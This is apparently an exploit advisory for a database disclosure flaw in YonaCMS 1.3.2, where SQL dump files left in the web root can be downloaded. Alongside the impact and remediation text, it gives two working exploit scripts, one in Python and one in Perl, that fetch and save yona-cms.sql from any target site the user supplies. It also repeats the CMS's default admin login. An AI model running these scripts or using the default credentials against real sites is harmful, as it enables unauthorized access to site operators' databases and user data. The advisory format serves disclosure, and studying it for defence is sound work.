YonaCMS Software 1.3.2 Database Disclosure

Risk: High
Local: No
Remote: Yes
CWE: CWE-200

########################################################################### # Exploit Title : YonaCMS Software 1.3.2 Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 05/04/2019 # Vendor Homepage : yonacms.com # Software Download Link : github.com/alexander-torosh/yona-cms/archive/master.zip # Software Information Link : demo.yonacms.com/news/phalcon-132-released.html github.com/alexander-torosh/yona-cms # Software Version : 1.3.2 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ] acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/ # Acunetix Reference Link About : [ Possible Database Backup File ] acunetix.com/vulnerabilities/web/possible-database-backup/ ########################################################################### # Information about Software : **************************** Yona CMS - open source content management system (CMS). Written in Phalcon PHP Framework (version 3.x supported) ########################################################################### # Impact : *********** * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server). The dump typically contains SQL statements to create the table, populate it, or both. This file contains an phpMyAdmin SQL dump. This information is highly sensitive and should not be found on a production system. * It looks like this file contains a database backup/dump. Acunetix inferred this filename from the domain name. A database backup contains a record of the table structure and/or the data from a database and is usually in the form of a list of SQL statements. A database backup is most often used for backing up a database so that its contents can be restored in the event of data loss. This information is highly sensitive and should never be found on a production system. Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible to the web server. As a workaround, you could restrict access to this file. ########################################################################### Installation ********** Composer Run composer create-project oleksandr-torosh/yona-cms -s dev Or create composer.json file and install dependencies: { "require": { "oleksandr-torosh/yona-cms": "dev-master" } } composer install After some time, do not forget run composer update for update dependencies: composer update Composer is required. It will install required libraries. If you have error with autoload.php file, the reason - missed composer update installation step. How to install Composer => getcomposer.org/doc/00-intro.md#installation-linux-unix-osx Admin dashboard Open http://yona-cms/admin and auth: login: yona password: yonacmsphalcon Change admin user password and delete yona user. Database Edit /app/config/environment/development.php and setup database connection. Import MySQL dump file yona-cms.sql Requirements php 5.6+ phalcon 3.0.0+ mysql php-intl apache (+mod_rewrite) or nginx ########################################################################### File : ****** /yona-cms.sql -- phpMyAdmin SQL Dump -- version -- phpmyadmin.net -- -- Host: localhost -- Server version: 5.6.23 -- PHP Version: 5.6.10-1~dotdeb+7.3 -- Database: `yona-cms` github.com/alexander-torosh/yona-cms/raw/master/yona-cms.sql File : ***** /yona_cms_postgres.sql -- PostgreSQL database dump -- Dumped from database version 9.4.8 -- Dumped by pg_dump version 9.4.8 raw.githubusercontent.com/alexander-torosh/yona-cms/master/yona_cms_postgres.sql ########################################################################### # Database Disclosure Information Exposure Exploit 1 : *********************************************** #!/usr/bin/python import string import re from urllib2 import Request, urlopen disc = "/yona-cms.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.*=*", html)) print rdo exit ########################################################################### # Database Disclosure Information Exposure Exploit 2 : *********************************************** #!/usr/bin/perl -w # Author : KingSkrupellos # Team : Cyberizm Digital Security Army use LWP::Simple; use LWP::UserAgent; system('cls'); system('YonaCMS Software Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="yona-cms.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/yona-cms.sql"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/yona-cms.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } ########################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###########################################################################

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